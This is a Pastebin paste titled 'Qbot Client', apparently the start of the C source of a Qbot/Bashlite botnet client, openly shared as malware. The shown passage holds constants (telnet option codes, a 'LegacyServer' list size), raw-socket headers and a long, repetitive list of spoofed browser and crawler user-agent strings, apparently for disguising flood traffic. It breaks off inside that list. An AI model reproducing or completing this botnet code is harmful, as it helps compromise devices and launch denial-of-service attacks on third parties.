Advertisement
Guest User

Qbot Client

a guest
Jan 2nd, 2018
128
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 111.33 KB | None | 0 0
  1. #define PHI 0x9e3779b9
  2. #define PR_SET_NAME 15
  3. #define SERVER_LIST_SIZE (sizeof(LegacyServer) / sizeof(unsigned char *))
  4. #define PAD_RIGHT 1
  5. #define PAD_ZERO 2
  6. #define PRINT_BUF_LEN 12
  7. #define CMD_IAC 255
  8. #define CMD_WILL 251
  9. #define CMD_WONT 252
  10. #define CMD_DO 253
  11. #define CMD_DONT 254
  12. #define OPT_SGA 3
  13. #define STD2_SIZE 65
  14. #define BUFFER_SIZE 1024
  15. //#define PRINTS_ENABLED
  16. #include <stdlib.h>
  17. #include <stdarg.h>
  18. #include <stdio.h>
  19. #include <sys/socket.h>
  20. #include <sys/types.h>
  21. #include <netinet/in.h>
  22. #include <arpa/inet.h>
  23. #include <netdb.h>
  24. #include <signal.h>
  25. #include <strings.h>
  26. #include <string.h>
  27. #include <sys/utsname.h>
  28. #include <unistd.h>
  29. #include <fcntl.h>
  30. #include <errno.h>
  31. #include <netinet/ip.h>
  32. #include <netinet/udp.h>
  33. #include <netinet/tcp.h>
  34. #include <sys/wait.h>
  35. #include <sys/ioctl.h>
  36. #include <net/if.h>
  37.  
  38. const char *UserAgents[] = {
  39. "Mozilla/4.0 (Compatible; MSIE 8.0; Windows NT 5.2; Trident/6.0)",
  40. "Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)",
  41. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00",
  42. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00",
  43. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00",
  44. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01",
  45. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00",
  46. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
  47. "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
  48. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0",
  49. "Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4",
  50. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0",
  51. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36",
  52. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36",
  53. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56",
  54. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7",
  55. "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
  56. "Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)",
  57. "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51",
  58. "Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16",
  59. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A",
  60. "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
  61. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36",
  62. "Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
  63. "Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36",
  64. "Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00",
  65. "Mozilla/4.0 (compatible; MSIE 9.0; Windows 98; .NET CLR 3.0.04506.30)",
  66. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)",
  67. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; InfoPath.3; SV1; .NET CLR 3.4.53360; WOW64; en-US)",
  68. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)",
  69. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-US)",
  70. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)",
  71. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0",
  72. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0",
  73. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0",
  74. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0",
  75. "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36",
  76. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
  77. "Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12 Version/12.16",
  78. "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
  79. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
  80. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
  81. "Mozilla/5.0 (compatible; Konqueror/3.0; i686 Linux; 20021117)",
  82. "Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5",
  83. "Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10",
  84. "Mozilla/5.0 Galeon/1.0.3 (X11; Linux i686; U;) Gecko/0",
  85. "Opera/6.04 (Windows XP; U) [en]",
  86. "Opera/9.99 (X11; U; sk)",
  87. "Mozilla/6.0 (Future Star Technologies Corp. Star-Blade OS; U; en-US) iNet Browser 2.5",
  88. "Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc",
  89. "Mozilla/5.0 Galeon/1.2.9 (X11; Linux i686; U;) Gecko/20021213 Debian/1.2.9-0.bunk",
  90. "Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41",
  91. "Mozilla/5.0 (compatible; iCab 3.0.3; Macintosh; U; PPC Mac OS)",
  92. "Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15"
  93. "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0",
  94. "Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1",
  95. "Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)",
  96. "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4",
  97. "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201",
  98. "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911",
  99. "Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2",
  100. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)",
  101. "Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285",
  102. "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7",
  103. "Mozilla/5.0 (PLAYSTATION 3; 3.55)",
  104. "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2",
  105. "wii libnup/1.0",
  106. "Mozilla/4.0 (PSP (PlayStation Portable); 2.00)",
  107. "PSP (PlayStation Portable); 2.00",
  108. "Bunjalloo/0.7.6(Nintendo DS;U;en)",
  109. "Doris/1.15 [en] (Symbian)",
  110. "BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1",
  111. "BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100"
  112. "findlinks/2.0.1 (+http://wortschatz.uni-leipzig.de/findlinks/)",
  113. "findlinks/1.1.6-beta6 (+http://wortschatz.uni-leipzig.de/findlinks/)",
  114. "findlinks/1.1.6-beta4 (+http://wortschatz.uni-leipzig.de/findlinks/)",
  115. "findlinks/1.1.6-beta1 (+http://wortschatz.uni-leipzig.de/findlinks/)",
  116. "findlinks/1.1.5-beta7 (+http://wortschatz.uni-leipzig.de/findlinks/)",
  117. "Mozilla/5.0 (Windows; U; WinNT; en; rv:1.0.2) Gecko/20030311 Beonex/0.8.2-stable",
  118. "Mozilla/5.0 (Windows; U; WinNT; en; Preview) Gecko/20020603 Beonex/0.8-stable",
  119. "Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.8.1b2) Gecko/20060821 BonEcho/2.0b2 (Debian-1.99+2.0b2+dfsg-1)",
  120. "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1b2) Gecko/20060821 BonEcho/2.0b2",
  121. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1b2) Gecko/20060826 BonEcho/2.0b2",
  122. "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1b2) Gecko/20060831 BonEcho/2.0b2",
  123. "Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.8.1b1) Gecko/20060601 BonEcho/2.0b1 (Ubuntu-edgy)",
  124. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a3) Gecko/20060526 BonEcho/2.0a3",
  125. "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2",
  126. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2",
  127. "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2",
  128. "AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)",
  129. "AppEngine-Google; (+http://code.google.com/appengine; appid: unblock4myspace)"
  130. "AppEngine-Google; (+http://code.google.com/appengine; appid: tunisproxy)",
  131. "AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-in-rs)",
  132. "AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-ba-k)",
  133. "AppEngine-Google; (+http://code.google.com/appengine; appid: moelonepyaeshan)",
  134. "AppEngine-Google; (+http://code.google.com/appengine; appid: mirrorrr)",
  135. "AppEngine-Google; (+http://code.google.com/appengine; appid: mapremiereapplication)",
  136. "AppEngine-Google; (+http://code.google.com/appengine; appid: longbows-hideout)",
  137. "AppEngine-Google; (+http://code.google.com/appengine; appid: eduas23)",
  138. "AppEngine-Google; (+http://code.google.com/appengine; appid: craigserver)",
  139. "AppEngine-Google; ( http://code.google.com/appengine; appid: proxy-ba-k)",
  140. "magpie-crawler/1.1 (U; Linux amd64; en-GB; +http://www.brandwatch.net)",
  141. "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)",
  142. "Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)",
  143. "MJ12bot/v1.0.8 (http://majestic12.co.uk/bot.php?+)",
  144. "MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+)",
  145. "Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)",
  146. "Mozilla/4.0 (Compatible; MSIE 8.0; Windows NT 5.2; Trident/6.0)",
  147. "Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)",
  148. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00",
  149. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00",
  150. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00",
  151. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01",
  152. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00",
  153. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
  154. "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
  155. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0",
  156. "Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4",
  157. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0",
  158. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36",
  159. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36",
  160. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56",
  161. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7",
  162. "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
  163. "Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)",
  164. "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51",
  165. "Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16",
  166. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A",
  167. "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
  168. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36",
  169. "Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
  170. "Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36",
  171. "Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00",
  172. "Mozilla/4.0 (compatible; MSIE 9.0; Windows 98; .NET CLR 3.0.04506.30)",
  173. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)",
  174. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; InfoPath.3; SV1; .NET CLR 3.4.53360; WOW64; en-US)",
  175. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)",
  176. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-US)",
  177. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)",
  178. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0",
  179. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0",
  180. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0",
  181. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0",
  182. "Mozilla/5.0 (compatible; Konqueror/3.0; i686 Linux; 20021117)",
  183. "Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5",
  184. "Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10",
  185. "Mozilla/5.0 Galeon/1.0.3 (X11; Linux i686; U;) Gecko/0",
  186. "Opera/6.04 (Windows XP; U) [en]",
  187. "Opera/9.99 (X11; U; sk)",
  188. "Mozilla/6.0 (Future Star Technologies Corp. Star-Blade OS; U; en-US) iNet Browser 2.5",
  189. "Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc",
  190. "Mozilla/5.0 Galeon/1.2.9 (X11; Linux i686; U;) Gecko/20021213 Debian/1.2.9-0.bunk",
  191. "Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41",
  192. "Mozilla/5.0 (compatible; iCab 3.0.3; Macintosh; U; PPC Mac OS)",
  193. "Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15"
  194. "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0",
  195. "Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1",
  196. "Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)",
  197. "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4",
  198. "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201",
  199. "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911",
  200. "Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2",
  201. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)",
  202. "Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285",
  203. "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7",
  204. "Mozilla/5.0 (PLAYSTATION 3; 3.55)",
  205. "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2",
  206. "wii libnup/1.0",
  207. "Mozilla/4.0 (PSP (PlayStation Portable); 2.00)",
  208. "PSP (PlayStation Portable); 2.00",
  209. "Bunjalloo/0.7.6(Nintendo DS;U;en)",
  210. "Doris/1.15 [en] (Symbian)",
  211. "BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1",
  212. "BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100",
  213. "Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16",
  214. "Opera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01",
  215. "Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62",
  216. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
  217. "Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
  218. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19",
  219. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)",
  220. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; uZardWeb/1.0; Server_JP)",
  221. "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 Skyfire/2.0",
  222. "SonyEricssonW800i/R1BD001/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1",
  223. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)",
  224. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20110517 Firefox/5.0 Fennec/5.0",
  225. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)",
  226. "MOT-V300/0B.09.19R MIB/2.2 Profile/MIDP-2.0 Configuration/CLDC-1.0",
  227. "Mozilla/5.0 (Android; Linux armv7l; rv:9.0) Gecko/20111216 Firefox/9.0 Fennec/9.0",
  228. "Mozilla/5.0 (compatible; Teleca Q7; Brew 3.1.5; U; en) 480X800 LGE VX11000",
  229. "MOT-L7/08.B7.ACR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1",
  230. "Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5",
  231. "Mozilla/5.0 (compatible; Konqueror/3.0; i686 Linux; 20021117)",
  232. "Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5",
  233. "Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10",
  234. "Mozilla/5.0 Galeon/1.0.3 (X11; Linux i686; U;) Gecko/0",
  235. "Opera/6.04 (Windows XP; U) [en]",
  236. "Opera/9.99 (X11; U; sk)",
  237. "Mozilla/6.0 (Future Star Technologies Corp. Star-Blade OS; U; en-US) iNet Browser 2.5",
  238. "Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc",
  239. "Mozilla/5.0 Galeon/1.2.9 (X11; Linux i686; U;) Gecko/20021213 Debian/1.2.9-0.bunk",
  240. "Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41",
  241. "Mozilla/5.0 (compatible; iCab 3.0.3; Macintosh; U; PPC Mac OS)",
  242. "Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15"
  243. "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0",
  244. "Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1",
  245. "Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)",
  246. "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 "
  247. "Firefox/3.5.3",
  248. "Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 "
  249. "Firefox/3.5.3 (.NET CLR 3.5.30729)",
  250. "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) "
  251. "Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
  252. "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) "
  253. "Gecko/20090718 Firefox/3.5.1",
  254. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 "
  255. "(KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1",
  256. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; "
  257. "SLCC2; .NET CLR 2.0.50727; InfoPath.2)",
  258. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; "
  259. ".NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR "
  260. "3.0.30729)",
  261. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; "
  262. "Trident/4.0)",
  263. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; "
  264. ".NET CLR 2.0.50727; InfoPath.2)",
  265. "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
  266. "Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)",
  267. "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51",
  268. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) "
  269. "Chrome/41.0.2228.0 Safari/537.36",
  270. "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201",
  271. "Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 "
  272. "Version/12.16",
  273. "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like "
  274. "Gecko",
  275. "Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) "
  276. "like Gecko",
  277. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 "
  278. "(KHTML, like Gecko) Version/7.0.3 Safari/7046A194A"
  279. "Baiduspider+(+http://www.baidu.com/search/spider.htm)",
  280. "Mozilla/5.0 (compatible; BecomeBot/3.0; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)",
  281. "Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)",
  282. "Mozilla/5.0 (compatible; BeslistBot; nl; BeslistBot 1.0; http://www.beslist.nl/",
  283. "BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)",
  284. "zspider/0.9-dev http://feedback.redkolibri.com/",
  285. "Mozilla/4.0 compatible ZyBorg/1.0 DLC (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)",
  286. "Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)",
  287. "Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)",
  288. "Mozilla/4.0 compatible ZyBorg/1.0 (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)",
  289. "Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)",
  290. "Mozilla/4.0 compatible ZyBorg/1.0 (wn-14.zyborg@looksmart.net; http://www.WISEnutbot.com)",
  291. "Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )",
  292. "Mozilla/2.0 (compatible; Ask Jeeves/Teoma; +http://sp.ask.com/docs/about/tech_crawling.html)",
  293. "Mozilla/2.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)",
  294. "Mozilla/2.0 (compatible; Ask Jeeves/Teoma)",
